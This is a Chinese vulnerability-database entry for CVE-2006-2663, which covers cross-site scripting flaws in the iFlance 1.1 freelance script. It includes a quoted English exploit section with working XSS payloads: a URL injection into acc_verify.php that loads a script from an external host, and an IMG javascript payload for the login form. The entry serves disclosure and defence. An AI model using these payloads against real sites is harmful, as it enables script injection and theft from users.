iFlance 多个跨站脚本攻击 (XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1194824 漏洞类型 跨站脚本
发布时间 2006-05-30 更新时间 2006-05-30
CVE编号 CVE-2006-2663 CNNVD-ID CNNVD-200605-522
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/83893
https://cxsecurity.com/issue/WLB-2006050178
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-522
|漏洞详情
iFlance1.1存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助对(1)acc_verify.php或(2)project.php的特定输入,注入任意Web脚本或HTML。
|漏洞EXP
iFlance

Homepage:

http://www.ifusionservices.co.uk/

Description:

iFlance is a powerful freelance script, that allows anyone to run their very own own professional, profitable

Freelancing website

Effected files:

acc_verify.php

project.php

all input boxes

XSS BY URL Injection of acc_verify.php

We put "> before and <" after the script tags to close the input box tags in the form box.

http://www.example.com/account/acc_verify.php?vk="><SCRIPT%20SRC=http://
ha.ckers.org/xss.js></SCRIPT><"&verify=verify

Another XSS attack is possible if you put this in the login box as username and pw:

<IMG SRC=javascript:alert('XSS')>

project.php is vulnerable too due to the input boxes on it for posting a new project.
|受影响的产品
Ifusionservices Iflance 1.1
|参考资料

来源:BUGTRAQ
名称:20060524iFlancev1.1
链接:http://www.securityfocus.com/archive/1/archive/1/435036/100/0/threaded
来源:VUPEN
名称:ADV-2006-1988
链接:http://www.frsirt.com/english/advisories/2006/1988
来源:SECUNIA
名称:20282
链接:http://secunia.com/advisories/20282
来源:XF
名称:iflance-multiple-scripts-xss(26696)
链接:http://xforce.iss.net/xforce/xfdb/26696
来源:OSVDB
名称:26044
链接:http://www.osvdb.org/26044
来源:OSVDB
名称:26043
链接:http://www.osvdb.org/26043
来源:SREASON
名称:984
链接:http://securityreason.com/securityalert/984